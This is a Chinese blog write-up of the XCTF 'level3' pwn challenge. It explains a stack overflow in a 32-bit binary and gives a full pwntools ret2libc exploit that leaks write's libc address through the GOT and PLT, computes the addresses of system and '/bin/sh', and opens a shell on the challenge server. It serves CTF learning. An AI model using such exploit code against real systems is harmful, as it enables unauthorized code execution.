攻防世界pwn——level3

已于 2022-11-05 11:32:07 修改
阅读量657 收藏 1
点赞数 1
分类专栏: PWN 文章标签: linux 运维 系统安全
于 2022-11-05 11:29:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62076255/article/details/127468064
版权

分析

题目提示摆明了ret2libc,附件是.gz,解压→tar,解压→两个文件

checksec

IDA

 

很明显漏洞点就在read里,可以读取比buf大的内容

cyclic得到偏移是140 

 得到plt表中write是0x8048340,got表中write是0x904A018,函数地址0x0804844B

ubuntu

ROPgadget --binary libc_32.so.6 --string "/bin/sh"

 /bin/sh相对位置是0x15902b

readelf -s libc_32.so.6|grep system
readelf -s libc_32.so.6|grep write

 libc表中,write的相对位置在0xd43c0,system的相对位置在0x3a940

所以,“/bin/sh”与write函数的相对距离为0x15902b -  0xd43c0 = 0x84c6b。system与write的相对距离为0x3a940-0xd43c0=-0x99A80

exp

获取write和read的got地址,通过plt来调用。库函数中字符串常量和函数之间的相对位置也是确定的

首先获取libc中的相对位置:找write和system的相对位置0x84c6b,可以用readelf,也可以脚本里的.symbols。算出write和system的相对位置是0x99A80

通过got来获得write的地址,并通过plt来调用它。注意,地址之间填充 4 个字节(b'0000')是因为,当程序的执行流因返回地址的改变跳到write,只是完成了一个跳转,而正常地call一个函数在跳转前会把eip先压入到栈内,跳转会缺失这一步,到达write后p32(elf.plt['write']) 这部分代表的内存会被压入ebp而不是eip,那么要想访问到后面函数 ,就需要在两者之间填充一个虚假的eip,这个可以随意,因为我们只需要write调用之后的效果,至于程序最后在返回时会不会segment default并不需要关心。b'0000'相当于填的是原来call的位置,因此该类漏洞的payload格式如下

b'0'*140+p32(elf.plt['write'])+b'0000'+p32(1)+p32(elf.got['write'])+p32(10)

在获得函数地址后控制程序的执行流,让它回到read的地方,从而使我们能够输入另一条payload来获得shell。回到 main 也一样,所以上面 b'0000' 的部分需要被改为main的地址0x08048484。这样程序就会返回write的地址(动态的),但是偏移我们以及得到,就可以通过偏移计算其他地址,system是write-0x99A80,"/bin/sh"是write+0x84c6b

from pwn import *
p = remote('61.147.171.105', 55076)
elf = ELF('level3')
libc = ELF('libc_32.so.6')

write_plt=elf.plt["write"] #0x8048340
write_got=elf.got["write"] #0x904A018
vul_addr=elf.symbols["vulnerable_function"] #0x0804844B
main_addr=elf.symbols['main'] #08048484

payload1=b'0'*140+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(10)
# 获取got地址后,通过plt来调用write
# p32(1)开始传入main的3个参数
p.sendlineafter("Input:\n",payload1)

write_addr=u32(p.recv()[:4])

system_addr=write_addr-0x99A80
binsh_addr=write_addr+0x84c6b
payload2=b'0'*140+p32(system_addr)+b'0000'+p32(binsh_addr)

p.sendline(payload2)
p.interactive()

总的来说,系统开启了 ASLR ,那么每次库的加载地址都不同,因此库函数的地址也不同,首先是利用write的got和plt来泄露动态的write地址。通过libc计算偏移,再利用前面泄露的write地址计算system和"/bin/sh"的动态地址,从而得到shell。

关于PIE和ASLR:ASLR和PIE的区别和作用_coke_pwn的博客-CSDN博客_aslr

有一篇讲的比较好的WP:攻防世界PWN题 level3 - 愚人呀 - 博客园 (cnblogs.com)

Lyrisฅ
关注
专栏目录
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1581
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
攻防世界——pwn(2)
weixin_44319142的博客
04-09 1326
hello_pwn 只有NX哟 没啥好说的,填充然后让60106c的位置为1853186401就可以啦 直接上exp from pwn import * p = process("./hello_pwn") p.recvuntil('lets get helloworld for bof\n') payload = "A"*4 + p64(1853186401) p.send(payl...
攻防世界pwn-level3】
a_silly_coder的博客
02-17 3290
下载文件后首先查看保护,发现可以进行栈溢出攻击 将文件拖入32位ida 进入vulnerable_function后,发现了read处有栈溢出漏洞 在查看代码后,发现没有提供system和bin/sh,但是由于给了libc,所以可以找到libc的偏移量,然后计算出system和bin/sh的加载地址。 对于plt表,got表,实际加载地址,我是这么理解的:通过elf.plt['write']获取到的是write在plt表中的地址1,这个地址1上存放的实际内容是write在got表的地..
攻防世界Level3
WangLal的博客
07-05 326
攻防世界PWN新手题 level3的WP 基本三步:checksec,file,执行文件 只开了NX防护,且是个32位的文件 放进IDA中查看 main函数中只调用了一个函数,vulnerable_function(),进入函数中查看 发现read函数可以制造栈溢出漏洞。 要注意,题目还给了一个库,level3的文件中没有System函数,所以只能调用库中的函数。同时,文件PIE没开代表libc中函数的编移量就是固定的,只要确认了libc的基址,然后计算出system函数的offset,就可以定位到s
攻防世界 level3
BengDouLove的博客
03-26 520
整个程序就这么几行代码, vul函数里有明显栈溢出,猜测是覆盖返回地址为system,,,但是程序里没有system也没有binsh,所以只能自己泄露 查一查write函数,三个参数,第一个为1代表输出,第二个是要输出东西的指针,第三个是输出长度 所以可以利用wirte,把第二个参数改为某个libc里面函数的地址,泄露出来,然后根据偏移得到system和binsh 但是只有一个read函数并不...
[攻防世界]level3
逆向萌新的博客
06-18 391
[攻防世界]level3,详细
攻防世界(pwn) level3
半岛铁盒的博客
03-23 424
先下载附件;,这个附件压缩包里面有好几层,挨着打开就好了 题目没有提供 System函数 和 bin/sh 字符串 来供我们调用; 可以突破的点只有read函数。通过覆盖返回地址,执行两次main函数。第一次泄漏write函数的地址,第二次执行system函数。 from pwn import* from LibcSearcher import* p=remote('111.200.241.244','31433') elf=ELF("1") main_addr=0x8048484 write_plt
攻防世界pwn-level2】
a_silly_coder的博客
01-14 260
下载文件后,首先查看保护 将文件拖入ida 32位,发现函数名明示了攻击点 点进vulnerable_function函数后,发现buf距离ebp有0x88的距离,但是可以读入0x100的大小,确定这是一道栈溢出的题目,溢出点就在此处。 确定溢出点后,开始寻找利用方式,发现代码中给出了system函数,在0x8048320的位置 随后寻找sh或者bin_sh字符串: 此时要素齐全,开始编写脚本。 设计栈的结构为: 脚本为: 发送脚本,开始攻击: ...
攻防世界pwn新手练习区——level0
smsyz2019的博客
10-31 1673
这是一个简单的利用栈溢出漏洞进行简单的ROP 下载附件,将程序放进虚拟机中 拿到程序首先检查程序开启了什么保护,输入 checksec 程序名称 checksec level0 可以看到这是一个64位程序,只开启了NX保护。NX保护简单来说就是代码不可执行。 例如你向栈上输入一段shellcode,那么NX保护就是防止这个shellcode的执行。 具体内容和其他的程序保护可以参考这个博客。l...
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1582
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
攻防世界——pwn(1)
weixin_44319142的博客
04-08 2868
get_shell
攻防世界 Pwn level3
MrTreebook的博客
11-22 304
攻防世界pwn level31.checksec看一下保护2.IDA反汇编分析程序3.漏洞利用4.exp附上 1.checksec看一下保护 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 32位,开启NX保
[攻防世界 pwn]——level3
Y_peak的博客
02-19 207
题目地址: https://adworld.xctf.org.cn/ 题目: 以前写过这个write up请点击 偷个懒, 师傅们不要介意
攻防世界 新手区 level3
winterze的博客
04-04 398
分享一位师傅写得,很详细,对我们小白很有帮助 https://www.cnblogs.com/cloud-tree/p/11929585.html 攻防世界 新手区 level3 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stac...
攻防世界-pwn新手区-level3
CHAWUCIREN1的博客
09-22 369
先检查运行一下 ida 看一下vulnerable_function函数 发现存在溢出,栈空间136,可以输入的长度256 但是没有发现system函数和/bin/sh 题目给了libc文件,可以 考虑利用一下 把libc丢到ida里面
攻防世界新——level3
weixin_62675330的博客
02-10 1461
攻防世界pwn新手区 level3 由题意可得可能跟libc有关。 ps:libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 引申: glibc 和 libc 都是 Linux 下的 C 函数库。 libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。 1.checksec查看保护 文件有两个,一个是elf文件,一个是so文件。 ps:so文件(shared object),so文件是
攻防世界-level3-Writeup
SkYe's Blog
05-15 520
level3 [collapse title=“展开查看详情” status=“false”] 考点:栈溢出、ROP(ret2libc) ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] write(1, "Input:\n", 7u); return read(0, &buf, 0x100u); //溢出 } 打开了 NX 保护栈数据不可执行,程序没有预留后门。解决办法就是 ret2libc ,这
攻防世界pwn新手区题解-level3
weixin_62621015的博客
04-17 1068
攻防世界pwn-level3详细题解。
【ctf】xctf攻防世界level3!!
elsa________的博客
04-05 1595
level3题解: 首先,检查一下程序基本信息: 程序很简单,保护开的也差不多。但是需要注意,这道题单独给出了libc,而且根据题目提示,程序中没有现成的system函数。这就需要我们从libc中动态加载system函数。 初步思路:PIE没有开启,那么在libc中函数的offset就是固定的,只要确认了libc的base address,然后计算出system函数的offset,就可以定位...
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值